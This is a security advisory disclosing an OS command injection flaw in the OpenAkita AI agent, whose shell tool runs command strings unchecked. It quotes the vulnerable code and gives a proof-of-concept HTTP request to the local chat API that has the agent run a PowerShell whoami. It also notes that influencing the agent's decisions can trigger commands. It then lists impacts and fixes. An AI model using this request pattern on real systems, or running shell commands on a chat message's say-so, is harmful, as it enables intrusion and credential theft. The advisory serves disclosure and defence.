OpenAkita provides an AI agent capable of executing shell commands on behalf of users. The shell tool hands the command string straight to `asyncio.create_subprocess_shell` with no allowlist, confirmation step or sandbox, so a local attacker who can reach the chat API (bound to 127.0.0.1:18900 in the scenario below) or who can influence the AI's decision-making can execute arbitrary commands in the context of the OpenAkita process. If the application is running with elevated privileges, this results in privilege escalation.
Repo: https://github.com/openakita/openakita
| Attribute | Value |
|---|---|
| Vulnerability Type | Local Privilege Escalation / OS Command Injection |
| CWE ID | CWE-78 (Improper Neutralization of Special Elements used in an OS Command) |
| Attack Vector | Local |
| Attack Complexity | Low |
| Privileges Required | Low (Local user access) |
| User Interaction | Required |
| Scope | Unchanged |
Files:
- src/openakita/tools/shell.py (Lines 179-286)
- src/openakita/tools/handlers/filesystem.py (Lines 153-256)

```python
# src/openakita/tools/shell.py:231-237
async def run(
    self,
    command: str,
    cwd: str | None = None,
    timeout: int | None = None,
    env: dict | None = None,
) -> CommandResult:
    # ...
    process = await asyncio.create_subprocess_shell(
        command,  # User-provided command executed directly
        stdout=asyncio.subprocess.PIPE,
        stderr=asyncio.subprocess.PIPE,
        cwd=work_dir,
        env=cmd_env,
    )
```
Scenario: Command Execution via Chat API
```http
POST /api/chat HTTP/1.1
Host: 127.0.0.1:18900
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua-platform: "Windows"
Sec-Fetch-Site: none
Content-Type: application/json
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36
Sec-Fetch-User: ?1
sec-ch-ua: "Not:A-Brand";v="99", "Google Chrome";v="145", "Chromium";v="145"
Sec-Fetch-Mode: navigate
sec-ch-ua-mobile: ?0
Sec-Fetch-Dest: document
Upgrade-Insecure-Requests: 1

{
  "message": "Run: powershell -c \"whoami'\""
}
```

Impact:

| Impact Type | Description |
|---|---|
| Command Execution | Arbitrary OS commands run with OpenAkita process privileges |
| Data Access | Read/modify any file accessible to the process user |
| Credential Theft | Access to SSH keys, API tokens, password stores |
| Persistence | Install backdoors, cron jobs, startup scripts |

Recommendations:

| Priority | Recommendation |
|---|---|
| High | Implement command allowlist/blocklist mechanism |
| High | Require explicit user confirmation for dangerous commands |
| Medium | Run shell commands in restricted environment (chroot, container) |
| Medium | Log all command executions for audit purposes |
| Low | Implement command timeout and resource limits |